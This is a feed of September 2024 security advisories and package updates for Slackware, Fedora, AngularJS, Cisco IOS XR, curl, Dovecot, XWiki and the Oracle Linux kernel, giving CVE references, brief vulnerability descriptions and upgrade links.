09.09.2024 20:33:03	slackware	[SSA:2024-253-01] netatalk (high)	New netatalk packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/netatalk-3.2.8-i586-1_slack15.0.txz: Upgraded. Bump bundled WolfSSL library to stable version 5.7.2, GitHub #1433. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-1544 https://www.cve.org/CVERecord?id=CVE-2024-5288 https://www.cve.org/CVERecord?id=CVE-2024-5991 https://www.cve.org/CVERecord?id=CVE-2024-5814 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/netatalk-3.2.8-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/netatalk-3.2.8-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/netatalk-3.2.8-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/netatalk-3.2.8-x86_64-1.txzMD5 signaturesSlackware 15.0 package:ea023949b9b9718c76cbc9400914d0bf netatalk-3.2.8-i586-1_slack15.0.txzSlackware x86_64 15.0 package:c7af679ac32c1e17c737756d968ddc52 netatalk-3.2.8-x86_64-1_slack15.0.txzSlackware -current package:6904bc31c57c731da7d3c8f3fbbb6a91 n/netatalk-3.2.8-i686-1.txzSlackware x86_64 -current package:a8f107e52dd2fee7f3814868df4dcda1 n/netatalk-3.2.8-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg netatalk-3.2.8-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-253-01
09.09.2024 23:20:05	npm	[NPM:GHSA-M9GF-397R-HWPG] AngularJS allows attackers to bypass common image source restrictions (low)	Improper sanitization of the value of the `[srcset]` attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing https://owasp.org/www-community/attacks/Content_Spoofing .This issue affects AngularJS versions 1.3.0-rc.4 and greater.Note:The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here https://docs.angularjs.org/misc/version-support-status .	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M9GF-397R-HWPG
09.09.2024 23:20:05	npm	[NPM:GHSA-MQM9-C95H-X2P6] AngularJS allows attackers to bypass common image source restrictions (low)	Improper sanitization of the value of the `[srcset]` attribute in `<source>` HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing https://owasp.org/www-community/attacks/Content_Spoofing .This issue affects all versions of AngularJS.Note:The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here https://docs.angularjs.org/misc/version-support-status .	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MQM9-C95H-X2P6
09.09.2024 04:19:04	fedora	[FEDORA-2024-a27e8b69a0] Fedora 40: thunderbird	Update to 128.2.0https://www.thunderbird.net/en-US/thunderbird/128.2.0esr/releasenotes/	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a27e8b69a0
09.09.2024 04:19:04	fedora	[FEDORA-2024-ee42af5a22] Fedora 40: chromium (high)	update to 128.0.6613.119High CVE-2024-8362: Use after free in WebAudioHigh CVE-2024-7970: Out of bounds write in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ee42af5a22
09.09.2024 04:06:11	slackware	[SSA:2024-252-01] python3 (critical)	New python3 packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/python3-3.9.20-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Bundled libexpat was updated to 2.6.3. Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict paramater is available. Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. Email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. For more information, see: https://pythoninsider.blogspot.com/2024/09/python-3130rc2-3126-31110-31015-3920.html https://www.cve.org/CVERecord?id=CVE-2024-28757 https://www.cve.org/CVERecord?id=CVE-2024-45490 https://www.cve.org/CVERecord?id=CVE-2024-45491 https://www.cve.org/CVERecord?id=CVE-2024-45492 https://www.cve.org/CVERecord?id=CVE-2024-7592 https://www.cve.org/CVERecord?id=CVE-2024-4032 https://www.cve.org/CVERecord?id=CVE-2015-2104 https://www.cve.org/CVERecord?id=CVE-2024-6232 https://www.cve.org/CVERecord?id=CVE-2023-27043 https://www.cve.org/CVERecord?id=CVE-2024-8088 https://www.cve.org/CVERecord?id=CVE-2024-6923 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/python3-3.9.20-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/python3-3.9.20-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/python3-3.11.10-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/python3-3.11.10-x86_64-1.txzMD5 signaturesSlackware 15.0 package:7a16800df88dde3f78f1479a6a8676f7 python3-3.9.20-i586-1_slack15.0.txzSlackware x86_64 15.0 package:8409cec0740a46683e2bd3e74f9e1be9 python3-3.9.20-x86_64-1_slack15.0.txzSlackware -current package:f697f24f3107d4f6c27e7c64c2345894 d/python3-3.11.10-i686-1.txzSlackware x86_64 -current package:a3c5f7144feeeb7aaf3727af3104d203 d/python3-3.11.10-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg python3-3.9.20-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-252-01
09.09.2024 03:45:05	fedora	[FEDORA-2024-1bd7266df0] Fedora 39: chromium	update to 128.0.6613.119High CVE-2024-8362: Use after free in WebAudioHigh CVE-2024-7970: Out of bounds write in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1bd7266df0
09.09.2024 03:00:00	cisa	[CISA-2024:0909] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0909
08.09.2024 04:47:13	rustsec	[RUSTSEC-2024-0373] `Endpoint::retry()` calls can lead to panicking (high)	In 0.11.0, we overhauled the server-side `Endpoint` implementation to enablemore careful handling of incoming connection attempts. However, some of thecode paths that cleaned up state after connection attempts were processedconfused the initial destination connection ID with the destination connectionID of a substantial package. This resulted in the internal `Endpoint` statebecoming inconsistent, which could then lead to a panic.https://github.com/quinn-rs/quinn/commit/e01609ccd8738bd438d86fa7185a0f85598cb58fThanks to [@finbear](https://github.com/finnbear) for reporting and investingating,and to [@BiagoFesta](https://github.com/BiagoFesta) for coordinating.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0373
10.09.2024 22:41:57	maven	[MAVEN:GHSA-W97F-W3HQ-36G2] Keycloak Denial of Service vulnerability (moderate)	A denial of service vulnerability was found in keycloak where the amount of attributes per object is not limited,an attacker by sending repeated HTTP requests could cause a resource exhaustion when the application send back rows with long attribute values.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W97F-W3HQ-36G2
10.09.2024 22:01:52	maven	[MAVEN:GHSA-PVMM-55R5-G3MM] XWiki Platform document history including authors of any page exposed to unauthorized actors (moderate)	### ImpactThe REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.On a private wiki, this can be tested by accessing `/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history`, if this shows the history of the main page then the installation is vulnerable.### PatchesThis has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.### WorkaroundsThere aren't any known workarounds apart from upgrading to a fixed version.### References* https://jira.xwiki.org/browse/XWIKI-22052* https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PVMM-55R5-G3MM
10.09.2024 18:15:14	alpinelinux	[ALPINE:CVE-2024-23184] dovecot vulnerability	[From CVE-2024-23184] Having a large number of address headers (From, To, Cc, Bcc, etc.) becomes excessively CPU intensive. With 100k header lines CPU usage is already 12 seconds, and in a production environment we observed 500k header lines taking 18 minutes to parse. Since this can be triggered by external actors sending emails to a victim, this is a security issue. An external attacker can send specially crafted messages that consume target system resources and cause outage. One can implement restrictions on address headers on MTA component preceding Dovecot. No publicly available exploits are known.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23184
10.09.2024 18:15:14	alpinelinux	[ALPINE:CVE-2024-23185] dovecot vulnerability	[From CVE-2024-23185] Very large headers can cause resource exhaustion when parsing message. The message-parser normally reads reasonably sized chunks of the message. However, when it feeds them to message-header-parser, it starts building up "full_value" buffer out of the smaller chunks. The full_value buffer has no size limit, so large headers can cause large memory usage. It doesn't matter whether it's a single long header line, or a single header split into multiple lines. This bug exists in all Dovecot versions. Incoming mails typically have some size limits set by MTA, so even largest possible header size may still fit into Dovecot's vsz_limit. So attackers probably can't DoS a victim user this way. A user could APPEND larger mails though, allowing them to DoS themselves (although maybe cause some memory issues for the backend in general). One can implement restrictions on headers on MTA component preceding Dovecot. No publicly available exploits are known.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23185
11.09.2024 19:00:00	cisco	[CISCO-SA-PAK-MEM-EXHST-3KE9FEFY] Cisco IOS XR Software UDP Packet Memory Exhaustion Vulnerability (high)	A vulnerability in the multicast traceroute version 2 (Mtrace2) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to exhaust the UDP packet memory of an affected device.This vulnerability exists because the Mtrace2 code does not properly handle packet memory. An attacker could exploit this vulnerability by sending crafted packets to an affected device. A successful exploit could allow the attacker to exhaust the incoming UDP packet memory. The affected device would not be able to process higher-level UDP-based protocols packets, possibly causing a denial of service (DoS) condition.Note: This vulnerability can be exploited using IPv4 or IPv6.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-PAK-MEM-EXHST-3KE9FEFY
11.09.2024 19:00:00	cisco	[CISCO-SA-NSO-AUTH-BYPASS-QNTEESP] Multiple Cisco Products Web-Based Management Interface Privilege Escalation Vulnerability (high)	A vulnerability in the JSON-RPC API feature in ConfD that is used by the web-based management interfaces of Cisco Crosswork Network Services Orchestrator (NSO), Cisco Optical Site Manager, and Cisco RV340 Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to modify the configuration of an affected application or device.This vulnerability is due to improper authorization checks on the API. An attacker with privileges sufficient to access the affected application or device could exploit this vulnerability by sending malicious requests to the JSON-RPC API. A successful exploit could allow the attacker to make unauthorized modifications to the configuration of the affected application or device, including creating new user accounts or elevating their own privileges on an affected system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-AUTH-BYPASS-QNTEESP
11.09.2024 19:00:00	cisco	[CISCO-SA-L2SERVICES-2MVHDNUC] Cisco IOS XR Software Network Convergence System Denial of Service Vulnerability (high)	A vulnerability in the handling of specific Ethernet frames by Cisco IOS XR Software for various Cisco Network Convergence System (NCS) platforms could allow an unauthenticated, adjacent attacker to cause critical priority packets to be dropped, resulting in a denial of service (DoS) condition.This vulnerability is due to incorrect classification of certain types of Ethernet frames that are received on an interface. An attacker could exploit this vulnerability by sending specific types of Ethernet frames to or through the affected device. A successful exploit could allow the attacker to cause control plane protocol relationships to fail, resulting in a DoS condition. For more information, see the Details ["#details"] section of this advisory.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-L2SERVICES-2MVHDNUC
11.09.2024 19:00:00	cisco	[CISCO-SA-ISIS-XEHPBVNE] Cisco IOS XR Software Segment Routing for Intermediate System-to-Intermediate System Denial of Service Vulnerability (high)	A vulnerability in the segment routing feature for the Intermediate System-to-Intermediate System (IS-IS) protocol of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to insufficient input validation of ingress IS-IS packets. An attacker could exploit this vulnerability by sending specific IS-IS packets to an affected device after forming an adjacency. A successful exploit could allow the attacker to cause the IS-IS process on all affected devices that are participating in the Flexible Algorithm to crash and restart, resulting in a DoS condition.Note: The IS-IS protocol is a routing protocol. To exploit this vulnerability, an attacker must be Layer 2-adjacent to the affected device and must have formed an adjacency. This vulnerability affects segment routing for IS-IS over IPv4 and IPv6 control planes as well as devices that are configured as level 1, level 2, or multi-level routing IS-IS type.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISIS-XEHPBVNE
11.09.2024 19:00:00	cisco	[CISCO-SA-IOSXR-XML-TCPDOS-ZEXVRU2S] Cisco IOS XR Software Dedicated XML Agent TCP Denial of Service Vulnerability (medium)	A vulnerability in the Dedicated XML Agent feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) on XML TCP listen port 38751.This vulnerability is due to a lack of proper error validation of ingress XML packets. An attacker could exploit this vulnerability by sending a sustained, crafted stream of XML traffic to a targeted device. A successful exploit could allow the attacker to cause XML TCP port 38751 to become unreachable while the attack traffic persists.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-XML-TCPDOS-ZEXVRU2S
11.09.2024 19:00:00	cisco	[CISCO-SA-IOSXR-SHELLUTIL-HCB278WD] Cisco IOS XR Software CLI Arbitrary File Read Vulnerability (medium)	A vulnerability in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker to read any file in the file system of the underlying Linux operating system. The attacker must have valid credentials on the affected device.This vulnerability is due to incorrect validation of the arguments that are passed to a specific CLI command. An attacker could exploit this vulnerability by logging in to an affected device with low-privileged credentials and using the affected command. A successful exploit could allow the attacker access files in read-only mode on the Linux file system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-SHELLUTIL-HCB278WD
11.09.2024 19:00:00	cisco	[CISCO-SA-IOSXR-PRIV-ESC-CRG5VHCQ] Cisco IOS XR Software CLI Privilege Escalation Vulnerability (high)	A vulnerability in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker to obtain read/write file system access on the underlying operating system of an affected device.This vulnerability is due to insufficient validation of user arguments that are passed to specific CLI commands. An attacker with a low-privileged account could exploit this vulnerability by using crafted commands at the prompt. A successful exploit could allow the attacker to elevate privileges to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-PRIV-ESC-CRG5VHCQ
11.09.2024 19:00:00	cisco	[CISCO-SA-IOSXR-PONCTLR-CI-OHCHMSFL] Cisco Routed Passive Optical Network Controller Vulnerabilities (high)	Multiple vulnerabilities in Cisco Routed Passive Optical Network (PON) Controller Software, which runs as a docker container on hardware that is supported by Cisco IOS XR Software, could allow an authenticated, remote attacker to perform command injection attacks, execute arbitrary commands on the affected system, or retrieve a cleartext password.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco plans to release software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-PONCTLR-CI-OHCHMSFL
11.09.2024 17:15:13	alpinelinux	[ALPINE:CVE-2024-8636] qt6-qtwebengine vulnerability	[From CVE-2024-8636] Heap buffer overflow in Skia in Google Chrome prior to 128.0.6613.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-8636
11.09.2024 13:15:02	alpinelinux	[ALPINE:CVE-2024-8096] curl vulnerability	[From CVE-2024-8096] When curl is told to use the Certificate Status Request TLS extension, often referred to as OCSP stapling, to verify that the server certificate is valid, it might fail to detect some OCSP problems and instead wrongly consider the response as fine. If the returned status reports another error than 'revoked' (like for example 'unauthorized') it is not treated as a bad certficate.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-8096
11.09.2024 10:39:47	curl	[CURL-CVE-2024-8096] OCSP stapling bypass with GnuTLS (medium)	When curl is told to use the Certificate Status Request TLS extension, oftenreferred to as OCSP stapling, to verify that the server certificate is valid,it might fail to detect some OCSP problems and instead wrongly consider theresponse as fine.If the returned status reports another error than "revoked" (like for example"unauthorized") it is not treated as a bad certficate.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-8096
11.09.2024 12:50:16	almalinux	[ALSA-2024:6569] 389-ds:1.4 security update (moderate)	389-ds:1.4 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6569
11.09.2024 03:00:00	oraclelinux	[ELSA-2024-12610] Unbreakable Enterprise kernel security update (important)	[5.4.17-2136.335.4]caches for x86_64. (Imran Khan) [Orabug: 36951041] - printk: add kthread for long-running print (Stephen Brennan) [Orabug: 36456582] - kdb: Use the passed prompt in kdb_position_cursor() (Douglas Anderson) - driver core: Fix uevent_show() vs driver detach race (Dan Williams) - pinctrl: ti: ti-iodelay: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - pinctrl: ti: ti-iodelay: Drop if block with always false condition (Uwe Kleine-Konig) - pinctrl: single: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - pinctrl: core: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - ipvs: Avoid unnecessary calls to skb_is_gso_sctp (Ismael Luceno)[5.4.17-2136.335.3]- MIPS: Octeon: Add PCIe link status check (Dave Kleikamp) [Orabug: 36947196] {CVE-2024-40968}[5.4.17-2136.335.2]- drm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq() (Dan Carpenter) [Orabug: 36898075] {CVE-2024-41022}- net: relax socket state check at accept time. (Paolo Abeni) [Orabug: 36768889] {CVE-2024-36484}- fsnotify: clear PARENT_WATCHED flags lazily (Amir Goldstein) [Orabug: 36922241] - NFSD: Increase NFSD_MAX_OPS_PER_COMPOUND (Chuck Lever) [Orabug: 36908594] - x86/cpu: Avoid cpuinfo-induced IPI pileups (Paul E. McKenney) [Orabug: 35773811][5.4.17-2136.335.1]- LTS tag: v5.4.280 (Alok Tiwari) - i2c: rcar: bring hardware to known state when probing (Wolfram Sang) - nilfs2: fix kernel bug on rename operation of broken directory (Ryusuke Konishi) [Orabug: 36896821] {CVE-2024-41034}- tcp: avoid too many retransmit packets (Eric Dumazet) [Orabug: 36841816] {CVE-2024-41007}- tcp: use signed arithmetic in tcp_rtx_probe0_timed_out() (Eric Dumazet) - net: tcp: fix unexcepted socket die when snd_wnd is 0 (Menglong Dong) - tcp: refactor tcp_retransmit_timer() (Eric Dumazet) - SUNRPC: Fix RPC client cleaned up the freed pipefs dentries (felix) [Orabug: 36940547] {CVE-2023-52803}- libceph: fix race between delayed_work() and ceph_monc_stop() (Ilya Dryomov) [Orabug: 36930128] {CVE-2024-42232}- ALSA: hda/realtek: Limit mic boost on VAIO PRO PX (Edson Juliano Drosdeck) - nvmem: meson-efuse: Fix return value of nvmem callbacks (Joy Chakraborty) - hpet: Support 32-bit userspace (He Zhe) - USB: core: Fix duplicate endpoint bug by clearing reserved bits in the descriptor (Alan Stern) [Orabug: 36896826] {CVE-2024-41035}- usb: gadget: configfs: Prevent OOB read/write in usb_string_copy() (Lee Jones) [Orabug: 36930138] {CVE-2024-42236}- USB: Add USB_QUIRK_NO_SET_INTF quirk for START BP-850k (WangYuli) - USB: serial: option: add Rolling RW350-GL variants (Vanillan Wang) - USB: serial: option: add Netprisma LCUK54 series modules (Mank Wang) - USB: serial: option: add support for Foxconn T99W651 (Slark Xiao) - USB: serial: option: add Fibocom FM350-GL (Bjorn Mork) - USB: serial: option: add Telit FN912 rmnet compositions (Daniele Palmas) - USB: serial: option: add Telit generic core-dump composition (Daniele Palmas) - ARM: davinci: Convert comma to semicolon (Chen Ni) - s390: Mark psw in __load_psw_mask() as __unitialized (Sven Schnelle) - udp: Set SOCK_RCU_FREE earlier in udp_lib_get_port(). (Kuniyuki Iwashima) [Orabug: 36896842] {CVE-2024-41041}- ppp: reject claimed-as-LCP but actually malformed packets (Dmitry Antipov) [Orabug: 36896856] {CVE-2024-41044}- net: ethernet: lantiq_etop: fix double free in detach (Aleksander Jan Bajkowski) [Orabug: 36896863] {CVE-2024-41046}- net: lantiq_etop: add blank line after declaration (Aleksander Jan Bajkowski) - octeontx2-af: Fix incorrect value output on error path in rvu_check_rsrc_availability() (Aleksandr Mishin) - tcp: fix incorrect undo caused by DSACK of TLP retransmit (Neal Cardwell) - tcp: add TCP_INFO status for failed client TFO (Jason Baron) - vfs: don't mod negative dentry count when on shrinker list (Brian Foster) - fs/dcache: Re-use value stored to dentry->d_flags instead of re-reading (linke li) - filelock: fix potential use-after-free in posix_lock_inode (Jeff Layton) [Orabug: 36896877] {CVE-2024-41049}- nilfs2: fix incorrect inode allocation from reserved inodes (Ryusuke Konishi) - nvme-multipath: find NUMA path only for online numa-node (Nilay Shroff) - ALSA: hda/realtek: Enable headset mic of JP-IK LEAP W502 with ALC897 (Jian-Hong Pan) - i2c: pnx: Fix potential deadlock warning from del_timer_sync() call in isr (Piotr Wojtaszczyk) [Orabug: 36897909] {CVE-2024-42153}- media: dw2102: fix a potential buffer overflow (Mauro Carvalho Chehab) - bnx2x: Fix multiple UBSAN array-index-out-of-bounds (Ghadi Elie Rahme) [Orabug: 36897886] {CVE-2024-42148}- drm/amdgpu/atomfirmware: silence UBSAN warning (Alex Deucher) - drm/nouveau: fix null pointer dereference in nouveau_connector_get_modes (Ma Ke) [Orabug: 36897640] {CVE-2024-42101}- Revert 'mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again' (Jan Kara) - fsnotify: Do not generate events for O_PATH file descriptors (Jan Kara) - can: kvaser_usb: Explicitly initialize family in leafimx driver_info struct (Jimmy Assarsson) - mm: optimize the redundant loop of mm_update_owner_next() (Jinliang Zheng) - nilfs2: add missing check for inode numbers on directory entries (Ryusuke Konishi) [Orabug: 36897652] {CVE-2024-42104}- nilfs2: fix inode number range checks (Ryusuke Konishi) [Orabug: 36897658] {CVE-2024-42105}- inet_diag: Initialize pad field in struct inet_diag_req_v2 (Shigeru Yoshida) [Orabug: 36897666] {CVE-2024-42106}- selftests: make order checking verbose in msg_zerocopy selftest (Zijian Zhang) - selftests: fix OOM in msg_zerocopy selftest (Zijian Zhang) - bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set() (Sam Sun) [Orabug: 36825248] {CVE-2024-39487}- tcp_metrics: validate source addr length (Jakub Kicinski) [Orabug: 36897915] {CVE-2024-42154}- UPSTREAM: tcp: fix DSACK undo in fast recovery to call tcp_try_to_open() (Neal Cardwell) - net: tcp better handling of reordering then loss cases (Yuchung Cheng) - tcp: add ece_ack flag to reno sack functions (Yousuk Seung) - tcp: tcp_mark_head_lost is only valid for sack-tcp (zhang kai) - s390/pkey: Wipe sensitive data on failure (Holger Dengler) [Orabug: 36897934] {CVE-2024-42157}- jffs2: Fix potential illegal address access in jffs2_free_inode (Wang Yong) [Orabug: 36897696] {CVE-2024-42115}- powerpc/xmon: Check cpu id in commands 'c#', 'dp#' and 'dx#' (Greg Kurz) - orangefs: fix out-of-bounds fsid access (Mike Marshall) [Orabug: 36897837] {CVE-2024-42143}- powerpc/64: Set _IO_BASE to POISON_POINTER_DELTA not 0 for CONFIG_PCI=n (Michael Ellerman) - i2c: i801: Annotate apanel_addr as __ro_after_init (Heiner Kallweit) - media: dvb-frontends: tda10048: Fix integer overflow (Ricardo Ribalda) [Orabug: 36897976] {CVE-2024-42223}- media: s2255: Use refcount_t instead of atomic_t for num_channels (Ricardo Ribalda) - media: dvb-frontends: tda18271c2dd: Remove casting during div (Ricardo Ribalda) - net: dsa: mv88e6xxx: Correct check for empty list (Simon Horman) [Orabug: 36897982] {CVE-2024-42224}- Input: ff-core - prefer struct_size over open coded arithmetic (Erick Archer) - firmware: dmi: Stop decoding on broken entry (Jean Delvare) - sctp: prefer struct_size over open coded arithmetic (Erick Archer) - media: dw2102: Don't translate i2c read into write (Michael Bunk) - drm/amd/display: Skip finding free audio for unknown engine_id (Alex Hung) [Orabug: 36897726] {CVE-2024-42119}- drm/amdgpu: Initialize timestamp for some legacy SOCs (Ma Jun) - scsi: qedf: Make qedf_execute_tmf() non-preemptible (John Meneghini) [Orabug: 36897761] {CVE-2024-42124}- IB/core: Implement a limit on UMAD receive List (Michael Guralnik) [Orabug: 36897847] {CVE-2024-42145}- media: dvb-usb: dib0700_devices: Add missing release_firmware() (Ricardo Ribalda) - media: dvb: as102-fe: Fix as10x_register_addr packing (Ricardo Ribalda) - drm/lima: fix shared irq handling on driver remove (Erico Nunes) [Orabug: 36897779] {CVE-2024-42127}- LTS tag: v5.4.279 (Alok Tiwari) - arm64: dts: rockchip: Add sound-dai-cells for RK3368 (Alex Bee) - ARM: dts: rockchip: rk3066a: add #sound-dai-cells to hdmi node (Johan Jonker) - tcp: Fix data races around icsk->icsk_af_ops. (Kuniyuki Iwashima) [Orabug: 34719866] {CVE-2022-3566}- ipv6: Fix data races around sk->sk_prot. (Kuniyuki Iwashima) [Orabug: 34719906] {CVE-2022-3567}- ipv6: annotate some data-races around sk->sk_prot (Eric Dumazet) - nfs: Leave pages in the pagecache if readpage failed (Matthew Wilcox (Oracle)) - pwm: stm32: Refuse too small period requests (Uwe Kleine-Konig) - mtd: spinand: macronix: Add support for serial NAND flash (Jaime Liao) - ftruncate: pass a signed offset (Arnd Bergmann) [Orabug: 36897558] {CVE-2024-42084}- ata: libata-core: Fix double free on error (Niklas Cassel) [Orabug: 36897374] {CVE-2024-41087}- batman-adv: Don't accept TT entries for out-of-spec VIDs (Sven Eckelmann) - drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_hd_modes (Ma Ke) [Orabug: 36897380] {CVE-2024-41089}- drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_ld_modes (Ma Ke) [Orabug: 36897444] 